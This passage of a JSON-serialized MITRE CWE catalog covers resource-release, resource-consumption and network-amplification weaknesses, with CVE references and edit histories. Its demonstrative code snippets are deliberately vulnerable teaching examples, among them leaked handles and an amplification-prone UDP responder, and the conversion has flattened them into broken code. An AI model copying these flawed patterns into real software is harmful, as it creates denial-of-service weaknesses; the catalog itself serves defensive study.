users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2215"},{"Reference":"CVE-2006-5397","Description":"Module opens a file for reading twice, allowing attackers to read files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5397"}]},"Affected_Resources":{"Affected_Resource":["System Process","File or Directory"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNIX file descriptor leak"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Ensure files are properly closed when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-392"}},{"attr":{"@_External_Reference_ID":"REF-393","@_Section":"Elevating Privileges Safely"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Affected_Resources, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Description, Name, Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"UNIX File Descriptor Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Exposure of File Descriptor to Unintended Control Sphere","attr":{"@_Date":"2013-02-21"}}]}},"404":{"attr":{"@_ID":"404","@_Name":"Improper Resource Shutdown or Release","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program does not release or incorrectly releases a resource before it is made available for re-use.","Extended_Description":"When a resource is created or allocated, the developer is responsible for properly releasing the resource as well as accounting for all potential paths of expiration or invalidation, such as a set period of time or revocation.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"405","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"619","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"Improper release or shutdown of resources can be primary to resource exhaustion, performance, and information confidentiality problems to name a few."},{"Ordinality":"Resultant","Description":"Improper release or shutdown of resources can be resultant from improper error handling or insufficient resource tracking."}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Availability","Other"],"Impact":["DoS: Resource Consumption (Other)","Varies by Context"],"Note":"Most unreleased resource issues result in general software reliability problems, but if an attacker can intentionally trigger a resource leak, the attacker might be able to launch a denial of service attack by depleting the resource pool."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"When a resource containing sensitive information is not correctly shutdown, it may expose the sensitive data in a subsequent allocation."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Resource clean up errors might be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."]},"Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated."]}},{"Phase":"Implementation","Description":"It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free memory in a function. If you allocate memory that you intend to free upon completion of the function, you must be sure to free the memory at all exit points for that function including error conditions."},{"Phase":"Implementation","Description":"Memory should be allocated/freed using matching functions such as malloc/free, new/delete, and new[]/delete[]."},{"Phase":"Implementation","Description":"When releasing a complex object or structure, ensure that you properly dispose of all of its member components, not just the object itself."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-81"},"Intro_Text":"The following method never closes the new file handle. Given enough time, the Finalize() method for BufferReader should eventually call Close(), but there is no guarantee as to how long this action will take. In fact, there is no guarantee that Finalize() will ever be invoked. In a busy environment, the Operating System could use up all of the available file handles before the Close() function is called.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}fil.Close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}}],"Body_Text":"The good code example simply adds an explicit call to the Close() function when the system is done using the file. Within a simple example such as this the problem is easy to see and fix. In a real system, the problem may be considerably more obscure."},{"attr":{"@_Demonstrative_Example_ID":"DX-82"},"Intro_Text":"This code attempts to open a connection to a database and catches any exceptions that may occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch ( Exception e ) {}","xhtml:div":[{"#text":"Connection con = DriverManager.getConnection(some_connection_string);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log( e );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}},"Body_Text":"If an exception occurs after establishing the database connection and before the same connection closes, the pool of database connections may become exhausted. If the number of available connections is exceeded, other users cannot access this resource, effectively denying access to the application."},{"attr":{"@_Demonstrative_Example_ID":"DX-83"},"Intro_Text":"Under normal conditions the following C# code executes a database query, processes the results returned by the database, and closes the allocated SqlConnection object. But if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();...","xhtml:br":["","","","","","","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-84"},"Intro_Text":"The following C function does not close the file handle it opens if an error occurs. If the process is long-lived, the process can run out of file handles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int decodeFile(char* fName) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char buf[BUF_SZ];FILE* f = fopen(fName, \\"r\\");if (!f) {}else {}fclose(f);return DECODE_SUCCESS;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"printf(\\"cannot open %s\\\\n\\", fName);return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (fgets(buf, BUF_SZ, f)) {}","xhtml:div":{"#text":"if (!checkChecksum(buf)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"}},{"#text":"decodeBlock(buf);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}]}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-85"},"Intro_Text":"In this example, the program does not use matching functions such as malloc/free, new/delete, and new[]/delete[] to allocate/deallocate the resource.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A {};void A::foo(){}","xhtml:div":[{"#text":"void foo();","attr":{"@_style":"margin-left:10px;"}},{"#text":"int *ptr;ptr = (int*)malloc(sizeof(int));delete ptr;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-86"},"Intro_Text":"In this example, the program calls the delete[] function on non-heap memory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A{};void A::foo(bool heap) {}","xhtml:div":[{"#text":"void foo(bool);","attr":{"@_style":"margin-left:10px;"}},{"#text":"int localArray[2] = {};int *p = localArray;if (heap){}delete[] p;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"11,22","attr":{"@_style":"margin-left:10px;"}},{"#text":"p = new int[2];","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""]}],"xhtml:br":""}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1127","Description":"Does not shut down named pipe connections if malformed data is sent.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1127"},{"Reference":"CVE-2001-0830","Description":"Sockets not properly closed when attacker repeatedly connects and disconnects from server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0830"},{"Reference":"CVE-2002-1372","Description":"Return values of file/socket operations not checked, allowing resultant consumption of file descriptors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1372"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improper resource shutdown or release"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unreleased Resource"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Release resources when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP14","Entry_Name":"Failure to release resource"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"125"}},{"attr":{"@_CAPEC_ID":"130"}},{"attr":{"@_CAPEC_ID":"131"}},{"attr":{"@_CAPEC_ID":"494"}},{"attr":{"@_CAPEC_ID":"495"}},{"attr":{"@_CAPEC_ID":"496"}},{"attr":{"@_CAPEC_ID":"666"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 8: C++ Catastrophes.&#34; Page 143"}}},"Notes":{"Note":{"#text":"Overlaps memory leaks, asymmetric resource consumption, malformed input errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Likelihood_of_Exploit, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"405":{"attr":{"@_ID":"405","@_Name":"Asymmetric Resource Consumption (Amplification)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Software that does not appropriately monitor or control resource consumption can lead to adverse system performance.","Extended_Description":"This situation is amplified if the software allows malicious users or attackers to consume more resources than their access level permits. Exploiting such a weakness can lead to asymmetric resource consumption, aiding in amplification attacks against the system or the network.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Resource Consumption (Other)"],"Note":"Sometimes this is a factor in \\"flood\\" attacks, but other types of amplification exist."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"An application must make resources available to a client commensurate with the client\'s access level."},{"Phase":"Architecture and Design","Description":"An application must, at all times, keep track of allocated resources and meter their usage appropriately."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Asymmetric resource consumption (amplification)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":41,"Entry_Name":"XML Attribute Blowup"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"TPS00-J","Entry_Name":"Use thread pools to enable graceful degradation of service during traffic bursts"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Release resources when they are no longer needed"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"406":{"attr":{"@_ID":"406","@_Name":"Insufficient Control of Network Message Volume (Network Amplification)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the software to transmit more traffic than should be allowed for that actor.","Extended_Description":"In the absence of a policy to restrict asymmetric resource consumption, the application or system cannot distinguish between legitimate transmissions and traffic intended to serve as an amplifying attack on target systems. Systems can often be configured to restrict the amount of traffic sent out on behalf of a client, based on the client\'s origin or access level. This is usually defined in a resource allocation policy. In the absence of a mechanism to keep track of transmissions, the system or application can be easily abused to transmit asymmetrically greater traffic than the request or client should be permitted to.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design","Note":"If the application uses UDP, then it could potentially be subject to spoofing attacks that use the inherent weaknesses of UDP to perform traffic amplification, although this problem can exist in other protocols or contexts."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"System resources can be quickly consumed leading to poor application performance or system crash. This may affect network performance and could be used to attack other systems and applications relying on network performance."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"An application must make network resources available to a client commensurate with the client\'s access level."},{"Phase":"Policy","Description":"Define a clear policy for network resource allocation and consumption."},{"Phase":"Implementation","Description":"An application must, at all times, keep track of network resources and meter their usage appropriately."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-113"},"Intro_Text":"This code listens on a port for DNS requests and sends the result to the requesting address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true:","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"data = sock.recvfrom(1024)if not data:(requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record)","xhtml:br":["","","",""],"xhtml:div":{"#text":"break","attr":{"@_style":"margin-left:10px;"}}}}}},"Body_Text":"This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed (\'spoofed\'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0513","Description":"Classic \\"Smurf\\" attack, using spoofed ICMP packets to broadcast addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0513"},{"Reference":"CVE-1999-1379","Description":"DNS query with spoofed source address causes more traffic to be returned to spoofed address than was sent by the attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1379"},{"Reference":"CVE-2000-0041","Description":"Large datagrams are sent in response to malformed datagrams.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0041"},{"Reference":"CVE-1999-1066","Description":"Game server sends a large amount.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1066"},{"Reference":"CVE-2013-5211","Description":"composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Network Amplification"}},"Notes":{"Note":[{"#text":"This can be resultant from weaknesses that simplify spoofing attacks.","attr":{"@_Type":"Relationship"}},{"#text":"Network amplification, when performed with spoofing, is normally a multi-channel attack from attacker (acting as user) to amplifier, and amplifier to victim.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Name, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Network Amplification","attr":{"@_Date":"2008-10-14"}}}},"407":{"attr":{"@_ID":"407","@_Name":"Inefficient Algorithmic Complexity","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being 